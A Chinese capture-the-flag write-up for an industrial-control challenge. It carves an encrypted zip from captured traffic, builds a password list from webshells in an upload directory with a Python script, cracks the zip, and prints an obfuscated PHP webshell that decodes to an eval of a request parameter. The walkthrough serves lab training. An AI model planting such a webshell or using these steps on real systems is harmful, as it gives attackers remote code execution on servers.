工控CTF_纵横网络靶场_隐藏的黑客

简介: 工控CTF_纵横网络靶场_隐藏的黑客

题目地址

https://game.fengtaisec.com/#/startQuestions/9

640.png


题目分析

根据情报得知工控现场发现某SCADA系统被黑客攻破,附件为黑客在目录留下的文件和当时时间段捕获到的一部分流量包,你能根据这些信息分析出蛛丝马迹来么flag形式为 flag{}。

关键字:捕获到的一部分流量包,你能根据这些信息分析    目录留下的文件


解题思路


下载文件,有一个upload目录 ,里面全是shell

640.png

640.png

还有一个流量包  打开

查找 flag、png、webshell等关键字,在查找webshell关键字时发现有个流量包里有个webshell.php,数据包里还有 pk开头的,说明存在zip文件

直接原始数据显示,将蓝色部分复制

076d660d6c29e78b6de1e2a149dcc453.png


使用010 Editor 新建一个16进制文件,将原始数据导入,保存为hack.zip文件

49444223f3b50cae4a53b5f94b2f9f1f.png

文件加密了需要解密,通过zip爆破工具进行暴力破解,爆破无果

upload目录下有很多php文件,获取upload文件中每个webshell的登陆密码进行爆破

python脚本收集脚本


import reimport os
passwd=[]s= os.listdir('./upload')for i in s:    f = open('upload/'+i,'r').read()    find=re.findall(r"\[(.*?)]",f)    find_1=' '.join(find)    passwd.append(find_1)p = open('passwd.txt', 'w')for lb in passwd:    p.write(lb + '\n')

得到密码文件

3d35ca6b082161dc66e74009589e66cf.png

使用zip爆破工具进行字典攻击 使用我们收集到的字典

85eece13b199b972c93445092d1cb534.png

爆破出解压密码为:7b8b965ad4bca

解压得到一个webshell.php,直接运行没有flag,需要进行审计


<?php error_reporting(0); @$c = array("1JFUVVFU1RbJzlhNzJjM","2Q1ZTc0ZjYwNTFiYjNiMzU","5MGZhOTMxOWZlJ10pOw","MGZhOTMxOWZlJ","MGZhOTMxOWZlJ");@$str="ZXZhbCgkX";@$o0o00o00o00o0o0 = chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);#$o0o00o00o00o0o0 = assert@$ooo00o0o0o0o0o0 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);#$ooo00o0o0o0o0o0 = base64_decode@$count = 0;for($x=0;$x<=9;$x++){#0,1,2        if (in_array($x, @$c)){                @$str=@$str.@$c[@$count];#拼接三次                if ($count == 2)#循环三次                {                               @$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str));                        #assert(base64_decode(ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))                        #assert(base64_decode(eval($_REQUEST['9a72c3d5e74f6051bb3b3590fa9319fe']);))                }                @$count++;        }}?>

直接echo输出@$o0o00o00o00o0o0(@$ooo00o0o0o0o0o0(@$str))

得到


@assert(@base64_decode(@ZXZhbCgkX1JFUVVFU1RbJzlhNzJjM2Q1ZTc0ZjYwNTFiYjNiMzU5MGZhOTMxOWZlJ10pOw))

进行base64解密 得到flag

base64在线解密:https://www.qqxiuzi.cn/bianma/base64.htm

4ef523cb2db2c89cf8cc2dc9a7b8d21e.png


flag{9a72c3d5e74f6051bb3b3590fa9319fe}

相关文章
|
6月前
|
存储 安全 网络安全
网络安全纵横谈:漏洞、加密与意识的三维防护网
【2月更文挑战第30天】在数字化时代,网络安全已成为维系信息完整性、确保用户隐私和保障企业资产的关键。本文深入探讨了网络安全领域中的三个核心议题:网络漏洞的挖掘与防御策略、加密技术的最新进展以及提升个体和企业的安全意识。通过对这些议题的分析,旨在为读者提供一个全面的网络安全知识框架,帮助构建更为坚固的信息防线。
|
4天前
|
机器学习/深度学习 人工智能 安全
AI与网络安全:防御黑客的新武器
在数字化时代,网络安全面临巨大挑战。本文探讨了人工智能(AI)在网络安全中的应用,包括威胁识别、自动化防御、漏洞发现和预测分析,展示了AI如何提升防御效率和准确性,成为对抗网络威胁的强大工具。
|
17天前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
17天前
|
安全 网络协议 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-1):主动信息收集之ping、Nmap 就怕你学成黑客啦!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-1):主动信息收集之ping、Nmap 就怕你学成黑客啦!
|
17天前
|
网络协议 安全 NoSQL
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
|
17天前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
|
17天前
|
人工智能 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(4-2):渗透测试行业术语扫盲完结:就怕你学成黑客啦!)作者——LJS
网络空间安全之一个WH的超前沿全栈技术深入学习之路(4-2):渗透测试行业术语扫盲完结:就怕你学成黑客啦!)作者——LJS
|
17天前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9-2):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
|
1月前
|
存储 传感器 安全
你应该知道的十大常见的黑客网络技术
你应该知道的十大常见的黑客网络技术
33 2

热门文章

最新文章